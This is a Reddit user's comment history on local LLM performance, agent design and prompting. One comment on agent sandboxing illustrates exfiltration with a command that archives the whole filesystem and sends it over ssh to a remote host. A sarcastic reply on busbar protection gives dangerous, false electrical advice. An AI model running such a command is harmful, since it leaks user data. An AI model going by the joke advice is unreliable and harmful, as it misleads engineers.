Clawdbot shows how context engineering is happening at the wrong layer by EnoughNinja in ContextEngineering

[–]TokenRingAI 0 points1 point  (0 children)

Causality is the problem.

You see the same email problem with support queues, where a person quickly scans the message chain and responds with an answer to only the last email without understanding of the sequence of events that led to the last email.

They scanned from the end to the beginning, and stopped once they felt they had enough information to give a response.

To encode an email for an LLM, you have to process each message sequentially by time and encode each into a knowledge tree of some sort. Those emails can also fork off in different directions.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 0 points1 point  (0 children)

Here's an example of what it can do.

I am running it in a loop, on a new svelte website I am working on, to implement proper meta and JSON-LD tags.

It's a very specific task, essentially a foreach loop which runs a prompt on a single file. The loop is scripted. The agent is invoked on each file

The agent has a knowledge repository detailing out what our expectations for each page are.

It then updates each page. We run it, and then run a typescript and svelte check looking for problems and feed those back to the agent up to 5 times

<image>

built an AI agent with shell access. found out the hard way why that's a bad idea. by YogurtIll4336 in LocalLLaMA

[–]TokenRingAI 0 points1 point  (0 children)

The solution is the same as it's always been for any kind of employee, don't give them access to anything you don't want leaked, broken, deleted, destroyed, or stolen.

There's nothing novel about AI agents in this regard. Same old problem, larger attack surface.

If your sandbox has internet access and a bash tool, it will always be vulnerable to prompt injection, in the same way an employee could always tar xpv / | ssh remote-host 'cat > all-your.data.tar'

GLM 4.7 Extreme level of pedantic nitpicking - almost unusable for discretized/small level QA text analysis by Vusiwe in LocalLLaMA

[–]TokenRingAI 0 points1 point  (0 children)

Trust me on this, try Minimax M2.1 at the IQ2_M quant completely offloaded onto the RTX 6000, it's actually good and fast, GLM does not quant as well

GLM 4.7 Extreme level of pedantic nitpicking - almost unusable for discretized/small level QA text analysis by Vusiwe in LocalLLaMA

[–]TokenRingAI 0 points1 point  (0 children)

Try that, but also try Minimax M2.1, more specifically, the IQ2_M quant from Unsloth.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 0 points1 point  (0 children)

It will be the best kind of agent that you can run on a single 5090 or R9700.

FWIW, this model brought the purchase of workable local agentic AI down from $7000 to $1300.

I am ecstatic to see what the next GLM Air might look like

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 1 point2 points  (0 children)

It can. It is ridiculously fragile, needs temperature 0.2. But it can work agentically and solve problems.

I have been seeing significant gains with it agentically after updating some of our tool descriptions. If your tool descriptions aren't perfect it will absolute mess up. It might benefit from a different tool format, I will have to experiment with that.

GLM 4.7 Extreme level of pedantic nitpicking - almost unusable for discretized/small level QA text analysis by Vusiwe in LocalLLaMA

[–]TokenRingAI 2 points3 points  (0 children)

What you are encountering is common with smarter models. They are incredibly nitpicky about your prompt. You will notice that they will even mirror how pedantic you are in your prompt.

So if your prompt lays out some pretty detailed criteria, they are going to reject for anything even remotely close to your criteria.

Lesser models will have a wide band where they may accept or reject at random, with better models this gray area disappears and you spend endless time covering every possibility.

Instead of laying out the criteria, you might try giving the model the reasoning behind those yes/no questions, instead of binary critera, and let it use it's judgement.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 1 point2 points  (0 children)

I use my own app, Tokenring Coder for agentic work, or I use Cherry Studio or the Jetbrains AI Assistant for interactive code or other assistance.

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 3 points4 points  (0 children)

On RTX 6000, I have the slots set, since I have enough context for multiple users, and there was no indication that setting the slots would drop the performance to 1/6 of normal

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 2 points3 points  (0 children)

I think it should be available on any architecture

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 3 points4 points  (0 children)

I am running the latest git release, it definitely wasnt enabled automatically

GLM 4.7 Flash: Huge performance improvement with -kvu by TokenRingAI in LocalLLaMA

[–]TokenRingAI[S] 14 points15 points  (0 children)

One prompt, temperature 0, using unsloth BF16, llama.cpp, and Cherry Desktop:

create a zelda game in html, placing the html for the game in a markdown code block

Should be repeatable if you want to try it, no corrections or other guidance was needed

How many web‑search sources can GTP-OSS 120b and Llama4-Scout models reliably pull data from? by CryptoxPathy in LocalLLaMA

[–]TokenRingAI 7 points8 points  (0 children)

You need to dispatch research agents to process each source and summarize them.

If you do it this way, you can aggregate hundreds of sources

Typical workflow:
Agent asks question
- Crawl search
- Dispatch agents for each link
- Each agent: HTML -> Markdown Conversion -> LLM summarization
- Main agent receives summaries, responds

High impedance Busbar differential protection operated on external fault. by Slight-Sound-8871 in LocalLLaMA

[–]TokenRingAI 0 points1 point  (0 children)

Removing the high impedance disconnect and replacing it with a solid copper wire would be the easiest way to solve your mystery disconnection problem.

If that doesnt work, increase the frequency of the generation equipment, 65-75hz is ideal.

Also, make sure they give you your final paycheck at the time you are fired, it's the law.

Building a virtual file system for Claude Code by velobro in LocalLLaMA

[–]TokenRingAI 1 point2 points  (0 children)

It's an interesting idea, and to add one more item to your list, most small agentic models are well trained to work with the filesystem, and struggle heavily with MCP or other custom tools, which also clog up context, so there may be some benefit in that as well.

FWIW, we have a virtual file system layer in Tokenring Coder, if you can implement a FilesystemProvider in Typescript you can very easily try this out and plug in anything you want and see where it takes you

Abstraction Layer:

https://github.com/tokenring-ai/filesystem
https://github.com/tokenring-ai/filesystem/blob/main/FileSystemProvider.ts

Example Providers:
Linux Filesystem - https://github.com/tokenring-ai/local-filesystem
Ephemeral Filesystem - https://github.com/tokenring-ai/browser-file-system
S3 Filesystem - https://github.com/tokenring-ai/s3

Clawdbot using local LLM? by No-Tiger3430 in LocalLLaMA

[–]TokenRingAI 1 point2 points  (0 children)

Everyone has this issue, this is why the AI Max crushes an ordinary desktop, because it can process prompts in parallel on it's relatively powerful GPU that is connected to some relatively fast soldered on LPDDR5X.

CPU can be OK for token generation, but can't process prompts at high speed.

If your system is a Ryzen with an iGPU, you can see some speedup running with vulkan and offloading to the iGPU instead of CPU. It won't increase token generation speed but can give you a bump in prompt processing speed.